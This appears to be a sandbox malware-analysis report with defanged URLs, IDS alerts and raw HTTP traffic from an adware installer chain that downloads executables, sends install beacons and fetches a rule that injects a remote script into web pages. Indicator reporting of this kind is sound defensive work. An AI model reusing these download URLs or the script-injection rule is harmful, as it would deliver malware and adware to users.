hxxp://www.nowtake.me/310714d/310714_am2.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://www.nowtake.me/310714d/310714_br.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf&update1=ref,pcm&update2=identifier,installer&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en
hxxp://www.tjepgz.cc/3517/1
hxxp://www.tjepgz.cc/files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/namen.php
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/tdownload.php
hxxp://www.nowtake.me/310714d/291014_nj.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://www.nowtake.me/registro/carregando.gif
hxxp://plainsavingscenter.com/mg?alpha=HyZPRnotGAhqT14bYGx1HmIcS3ofYE03fWFKOXdhHXUOIX0+L1I0EmhiTjJaMDJXZwQZUlU2MQZRaxkdDC51SwhncVMJcU8OQzZrVi9y
hxxp://www.nowtake.me/310714d/310714_gs.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://related.deals/services/stores?dummy=526
hxxp://related.deals/services/rules?dummy=212
hxxp://related.deals/services/update/1.0.0/iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL/120
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.dlzip1.istartsurf.finish,9
hxxp://plainsavingscenter.com/fp?alpha=UHAKO1kqRR0MZFxoJRFWUTRZNllQLBxKGHdxWy8GFiAEb0pGWwdKP1BGZToMDnt+bFElG2A/bkprKRY8VzgCOSk8BjouWnBZH08abykoWDgPbRFvGER0QkZRIhoKekJQIFMwXQwKCkk3WjsQPBUNbg9vI1cCYToaUXdbZ01DdzVlIlgPD3YdVDEZOBwoJGxSXQJuWXoCF2ULRklwHhhwQUtwUz1YVxwLRCdTOwZsDBxlWX52WRZnOQ0eK1YHFwpwKGJnLhYddAdfc0BhW3UlP0UndhgaOEcSeF1HWCceDnlHQHAVcVFrQBwIcgtmGz99C2ALGiBWGxA4HD1rUmM5VTgHPitMb0kuXghdGD16X3l/VWUORzlZXjw=
hxxp://goo.gl/Bw14Po
hxxp://plainsavingscenter.com/ii?alpha=[parameter value not preserved in the report]
hxxp://plainsavingscenter.com/if?alpha=[parameter value not preserved in the report]
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/index.php
hxxp://dyno3mlj15jgv.cloudfront.net/V19/amipb.js
hxxp://log.very911.com/install.gif?bundle=istartsurf&ptid=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.regok
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.hp
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/finalize.php
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.finish
hxxp://www.tjepgz.cc/3517/2
hxxp://www.tjepgz.cc/files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip
hxxp://brsoftwarellc.com/services/rules.txt?dummy=504
hxxp://brsoftwarellc.com/services/update.php?v=1.0.0&key=ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB&dummy=153
hxxp://www.gosaferllc.com/services/rules.txt?dummy=534
hxxp://www.gosaferllc.com/services/update.php?v=1.0.0&key=DjgSrxXMrVZd5ZDoXibWfcZQfB0nLdzw&dummy=112
hxxp://www.ninjasoftwarellc.com/services/rules.txt?dummy=243
hxxp://www.ninjasoftwarellc.com/services/update.php?v=1.2.0&key=FVz40gdklAiQUMMUD3ARa8NDKI9Pp0VX&dummy=708
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.wpm
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.ient
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.RegWrite
hxxp://xa.xingcloud.com/v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action2=visit&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,pcm
hxxp://xa.xingcloud.com/v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=install.pcm
hxxp://xa.xingcloud.com/v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action1=visit&action2=install
hxxp://xa.xingcloud.com/v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,4.0.1.2105
hxxp://up.soft365.com/Fan/rebirth?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&ptid=pcm&ver=4.0.1.1716&dname=istartsurf
hxxp://cdn1.downloadcrest.com/V19/amipb.js
hxxp://www.related.deals/services/rules?dummy=212
hxxp://www.amoninst.com/index.php
hxxp://www.4threquest.me/310714d/310714_gs.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://www.4threquest.me/010914s/010914i.htm
hxxp://install.plainsavingscenter.com/ii?alpha=U2xSOyMpaRAdPUgWfREsUigBNiNTMF4TLnZUE29sDGkDO3dGUF8tEQB3EC0RXjwOMAgQDGV/NA0TV2o3VjgrJVU5cBEhOwMzQT50KXp9FixQITs5KQYpBhVhM0EHdDhdP3peIQISTzxPJVtTOXR6fEocLiAYIU1jSWh3FTxTSFs4JCszViohFHZJPHYuaTpVJQ9xUnR+RmwHRSUzVgUvTRdiA3RzTlAOEg8EOBpoJH04CAhSVQQ8J2NGagN5MFM4LC0CaDFseHYPVScoKWwobRV0HBcNNCsaLkRbMyYATStmEStRbmBTUl8wFAJsEX4tWT5HCQYNTmN+Il8CY3dVFGZ4bhZ+N095dF4gAms0bDV7CzEbYFF0fltrAUcjNUEFO3kMbls9ZldDCV1HQS1QPWRQOQs/AQQXSWc2EzNAPyVOXHBiEWg6AERhU3QRfW85MmJYJQcuVipyDH9WAS4sAkx4P1crU3wrBhBYTT5bLEc3cXlwJGdVUBoqeT4bZ3U2aRVsOG8KYDAdU1ttTjUoInAxd1hVYh8qG2kRLQohXmJTEiwvM2RMaWNXTEI0OSQ+NmwwW2ojLAYVTyp5OkJ8VjlmWzg4cVg8QyJiPCYQEA==
hxxp://www.amoninst.com/finalize.php
hxxp://www.amoninst.com/namen.php
hxxp://www.4threquest.me/registro/carregando.gif
hxxp://www.downloadcrest.com/tdownload.php
hxxp://www.related.deals/services/update/1.0.0/iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL/120
hxxp://4threquest.me/310714d/310714_am2.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://4threquest.me/310714d/310714_a9.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://www.mobimidia.com/mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA=
hxxp://4threquest.me/310714d/240714_ps.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://e0.extreme-dm.com/s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://www.4threquest.me/registro/310113f8.htm
hxxp://www.4threquest.me/registro/icone_cadeado.gif
hxxp://www.4threquest.me/010914s/verificar_ip.php
hxxp://www.mobimidia.com/mobile/MobiMidia_validation.js
hxxp://www.4threquest.me/310714d/310714_br.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://install.plainsavingscenter.com/mg?alpha=HyZPRnotGAhqT14bYGx1HmIcS3ofYE03fWFKOXdhHXUOIX0+L1I0EmhiTjJaMDJXZwQZUlU2MQZRaxkdDC51SwhncVMJcU8OQzZrVi9y
hxxp://www.brsoftwarellc.com/services/rules.txt?dummy=504
hxxp://www.mobimidia.com/mobile/mt-core.js
hxxp://install.plainsavingscenter.com/fp?alpha=UHAKO1kqRR0MZFxoJRFWUTRZNllQLBxKGHdxWy8GFiAEb0pGWwdKP1BGZToMDnt+bFElG2A/bkprKRY8VzgCOSk8BjouWnBZH08abykoWDgPbRFvGER0QkZRIhoKekJQIFMwXQwKCkk3WjsQPBUNbg9vI1cCYToaUXdbZ01DdzVlIlgPD3YdVDEZOBwoJGxSXQJuWXoCF2ULRklwHhhwQUtwUz1YVxwLRCdTOwZsDBxlWX52WRZnOQ0eK1YHFwpwKGJnLhYddAdfc0BhW3UlP0UndhgaOEcSeF1HWCceDnlHQHAVcVFrQBwIcgtmGz99C2ALGiBWGxA4HD1rUmM5VTgHPitMb0kuXghdGD16X3l/VWUORzlZXjw=
hxxp://www.brsoftwarellc.com/services/update.php?v=1.0.0&key=ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB&dummy=153
hxxp://www.4threquest.me/310714d/291014_nj.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://install.plainsavingscenter.com/if?alpha=VmkaOm5eUxUWBXAqNRBhVy1JN25WNRYSY3NRW24hCWxLOjpDVRcsXAVyWCxcWzlGMUUVCS1+eQgWH2t6Uz1jJBg8dVkgdgY2CT85LH81F2FVJHM4ZAMsThQsNkRPdXVYOjJfbAcXBz0CIF4bODl/eQIdYyUdaUwuTG0/FHFWTRM5aS4+CysLX2BQY0J0MCgvNUgpfyxrBD8XUDNmChxuNF06Ri1uHRUeUgFSNQc/Ogp9GXlGA0kGenNHNh4uOA9jJG8ObD4OVCpYUwE5JSp3bl1sFGsZbjNCehgTMVxYS3UXMy4Zby9KVU9BZw11UmN4SWMPbBBLTS18OhUsDTM6XkE/aVpnKAdwLBdSVWFvdS4vRAR0ZXwpbRY5DAU3f1lJJGIWbQRvMlxLCkYQUTUHIj0Mfx9/UQNdMmF/H38LNysILGwqGyZrTnkrW2RSaDZfNzsINVctDHNXHjULEzowZFwpNgV7Xzo1RRgeWl5Wawt1KVs5EmYSSh50OjoXPkZmeFk8FTAaMWFbUGJ0PAY8OzwpMwBhYiRAKGdWOBAbMC1zZhcMIS4SczZQGG4/bypaEGh7BxliKEMUSmRedQgrDjckQ0USTwhAOhpyeHN3VXlufnIFLnojEQ==
hxxp://www.related.deals/services/stores?dummy=526
hxxp://www.amoninst.com/thankyou.php
hxxp://www.4threquest.me/registro/top-line.gif


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET MALWARE SoundCloud Downloader Install Beacon

Traffic

GET /mobile/MobiMidia_validation.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 23 Apr 2015 07:23:56 GMT
Server: Apache
Last-Modified: Sun, 27 Oct 2013 16:29:25 GMT
ETag: "1b34285-23a2-4e9bb7c92e340"
Accept-Ranges: bytes
Content-Length: 9122
Connection: close
Content-Type: application/x-javascript
if (ID_MobiMidia_Serv != '') {.    .    ApiBlock = false;.    //docume
nt.write(unescape(""));. . . . docume
nt.write(unescape(""));. function MobiMi
dia_addOption(selectId, txt, val, selected) {..var objOption = new Opt
ion(txt, val, selected);..self.document.getElementById(selectId).optio
ns.add(objOption);. }. function MobiMidia_keyNumber(e) {.
if (e.keyCode != 9 && e.keyCode != 13) {. var keyChar = St
ring.fromCharCode(e.which ? e.which : e.keyCode);. filtered
Values = "1234567890";. if ((filteredValues.indexOf(keyChar
) == -1) && ((keyChar.charCodeAt(0) != 8)&&(keyChar.charCodeAt(0) != 4
6)&&(keyChar.charCodeAt(0) != 37)&&(keyChar.charCodeAt(0) != 38)&&(key
Char.charCodeAt(0) != 39)&&(keyChar.charCodeAt(0) != 40)) ) return fal
se;. }. }. function MobiMidia_AtivaCel() {. if (se
lf.document.getElementById('MobiMidia_DDD').value.length == 2) {.
self.document.getElementById('MobiMidia_Number').focus();.
}. }. . function MobiMidia_NonoDigito() {. if (self
.document.getElementById('MobiMidia_DDD').value < 30) {.

<<< skipped >>>

GET /310714d/310714_br.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:34 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 1112281
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_br.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
......................................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc................v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

GET /310714d/291014_nj.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:38 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 1849280
Content-Description: File Transfer
Content-Disposition: attachment; filename="291014_nj.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
......................................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc................v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

GET /310714d/310714_gs.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:46 GMT
Content-Type: application/octet-stream
Content-Length: 1112379
Last-Modified: Thu, 23 Apr 2015 07:24:03 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
......................................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc................v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

GET /010914s/verificar_ip.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
Content-Encoding: gzip
18............s.......X.......0..HTTP/1.1 200 OK..Server: nginx/1.0.15
..Date: Thu, 23 Apr 2015 07:24:56 GMT..Content-Type: text/html..Transf
er-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.4.30
..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requ
ested-With..X-Cache: BYPASS..CC: UA..Content-Encoding: gzip..18.......
.....s.......X.......0..


GET /services/rules.txt?dummy=504 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:32 GMT
Content-Type: text/plain
Content-Length: 94
Connection: keep-alive
Last-Modified: Fri, 13 Feb 2015 14:24:53 GMT
ETag: "5ac277-5e-50ef8fffcf740"
Cache-Control: max-age=600
Expires: Thu, 23 Apr 2015 07:34:32 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
Accept-Ranges: bytes
</body>|<script src="//queryjs.me/services/script.js" type="t
ext/javascript"></script></body>.HTTP/1.1 200 OK..Serve
r: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:32 GMT..Content-Type: tex
t/plain..Content-Length: 94..Connection: keep-alive..Last-Modified: Fr
i, 13 Feb 2015 14:24:53 GMT..ETag: "5ac277-5e-50ef8fffcf740"..Cache-Co
ntrol: max-age=600..Expires: Thu, 23 Apr 2015 07:34:32 GMT..P3P: CP="P
otato"..X-Cache: MISS..X-Server: Provided by Intermedia..X-Country: EU
..Accept-Ranges: bytes..</body>|<script src="//queryjs.me/ser
vices/script.js" type="text/javascript"></script></body>
;.
....
GET /services/update.php?v=1.0.0&key=ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB&dummy=153 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:33 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: EU
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:33 
GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-aliv
e..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia
..X-Country: EU..


GET /registro/icone_cadeado.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: image/gif
Content-Length: 2256
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 23 May 2015 07:24:25 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GIF89a(.2....aH........z......i........r........X..7..................
.....8.. .....x..g.................?.....7..E.....n....f...^..$..H....
..........[........2...........:...........z.......m...W..l...........
......... ...................\........h..h4.p......*...........4......
........ ..............u.....3........K....{(.....(...........#.....i.
.J..b..........m........o.....................N.................l.....
#................c.................|..........I0............>....{.
........N.|=.m$..........w(..E.......L...[.s.%...a..g*..........v...3.
s........~..o .......................=..>....m...Z.....x...........
1........g........d......9*..............._....................z..t..}
........L..Y..B.....J..&.....0......................z>.. .q .......
....E.|.............!.......,....(.2........H..?;2n}.....|....H.....S.
..1..9),...F.-.(7&..b.K...u..1...vn.z)RF....5.!..B!...L...-.........d.
6.h.....2..h.&.?.1.&... .X1r..!D..da..t;0.7|s...*.lH.....U...........?
.......p....HK..r...jp...(e.........y.c.........mT.d$q.. (....G.d..P..
.S..)f..D........Td.;tw.`!...#..C a.....0..z....Z..r..V.0.1.x3.?....(.
6..l..C..y8"..N...=.L1B'....._....3|@.6#...8.(`......,.....;@QB#..BL..
$.d7.L0..A...:60..8.|@...l0........hA...<"..I......R..tt.O.'.aH..).
%[email protected].........(..3W....0xP.$".P.............X`*.......^.J....!. ..
......G..t..........j...<.."..A.......i.QJ.......jI\l.Zp....k......
....-.R....Yd.J.........n.?..H....D..DAo..jB_vJ.z.%................'lF
.......R...]d..".*;0"H.`....@r... .@[email protected].=k..@

<<< skipped >>>

GET /010914s/010914i.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: VVV.4threquest.me


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:26 GMT
Content-Type: text/html
Last-Modified: Mon, 08 Dec 2014 13:27:43 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Content-Encoding: gzip
2de.............Tmo.0..L~.wHlSI.....[...` (.|Bnri\.... ....N...D?4....
.s.99...\~y.`...i..(3.Th$.L...k...lj........~'.....h..B...P].........4
...(S..S....7.uE....A..}..P.!c.u@(..0..s.~>...0..*...Z Y..7v..N..Y{
C..).=a._._.....rq......M.'x.....u:...V.J.....-Z.&..md.z.2..Z~..HN.Hc.
.25....H.i.~S.&J..7-.....Z.i...) .Zm...Q3...aV..*.....-`...........0..
.......^....b.*`.$...--......tu.j...toe/..j../V.,.M.F....l.5..w..7...g
b..6........-V....y..s....x...^.w....#jj"...........m...k...4..d.^Q...
\..RI......v".ck.*..Zu..3QJ....8..hi\.r]bvr*..x.....r.EM..U&..Xh3...9%
.~..k..h.|...).v...v...vZ.<.. .9.#..]..!.x...a...D.A.......Y.......
.8g....v.P.c7.;M.i..w.$.:nO.....A..A..).>.G.x9Nog...:;:.. ...@ '{.\
o.U9..n.=Hj(...^...J8.;....g............`...G.....0..HTTP/1.1 200 OK..
Server: nginx/1.0.15..Date: Thu, 23 Apr 2015 07:24:26 GMT..Content-Typ
e: text/html..Last-Modified: Mon, 08 Dec 2014 13:27:43 GMT..Transfer-E
ncoding: chunked..Connection: keep-alive..Access-Control-Allow-Origin:
*..Access-Control-Allow-Headers: X-Requested-With..CC: UA..Content-En
coding: gzip..2de.............Tmo.0..L~.wHlSI.....[...` (.|Bnri\.... .
...N...D?4.....s.99...\~y.`...i..(3.Th$.L...k...lj........~'.....h..B.
..P].........4...(S..S....7.uE....A..}..P.!c.u@(..0..s.~>...0..*...
Z Y..7v..N..Y{C..).=a._._.....rq......M.'x.....u:...V.J.....-Z.&..md.z
.2..Z~..HN.Hc..25....H.i.~S.&J..7-.....Z.i...) .Zm...Q3...aV..*.....-`
...........0.........^....b.*`.$...--......tu.j...toe/..j../V.,.M.F...
.l.5..w..7...gb..6........-V....y..s....x...^.w....#jj"...........

<<< skipped >>>

GET /i.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: t1.extreme-dm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 23 Apr 2015 07:23:55 GMT
Content-Type: image/gif
Content-Length: 1004
Last-Modified: Thu, 26 Feb 2004 13:56:07 GMT
Connection: close
ETag: "403dfaf7-3ec"
Expires: Fri, 24 Apr 2015 07:23:55 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
GIF89a).&..>...............!..5&..*))%.9..J..N..k..n*(U)%p*.VQ%%X."
c&QPLLtttjhfaMf...$.....-&.9B.1B.S .ww.ii.RM.RM.po.dk.s...11.el.ZZ.c..
a..{..y...{.........................................................!.
....@.,....)[email protected],..H.o.l:..(S.KZ.G..............j.... pwX.....@.
....-...cuHwy`..~......~-...[El.}...........*~...E.E`./..... ......Y.C
........"."..10...% .B.Bz.-........."22442.1/'6L<%g....0.......B,.A
. .e7v.0...........C....e..P...9p..1........1 .>[email protected].. u.H.b../
[email protected].^.a.\. ..X...l.......7d.8...............hB..3G..Wc0Ci..=.C..<
;;....lsZ....2.7..y.g/F..2.e.1...;V<..".....gj..,d..).@.#...=^....B
.zK...q-...q.......cD..r.b...2>...D...x.X&.F....c...,.Z..2..#.v..@
t.....`.Z,=.^2..>..Av8...$......@`B........G!...`..-..BD6.......g..
.<[email protected]........>...>......
..B...........G...h....yUJ`...5...W.....|..PE1.&./X`A... .E...Y.(...Q.
I0......ffAW....p......Q.\u..,[email protected]...
.`.......nDK...,..._d...xq.m........k...........n.A..;..


GET /Fan/rebirth?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&ptid=pcm&ver=4.0.1.1716&dname=istartsurf HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: up.soft365.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 Apr 2015 07:25:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14p1
Content-Encoding: gzip
14........................0..


GET /v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action1=visit&action2=install HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:25:01 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
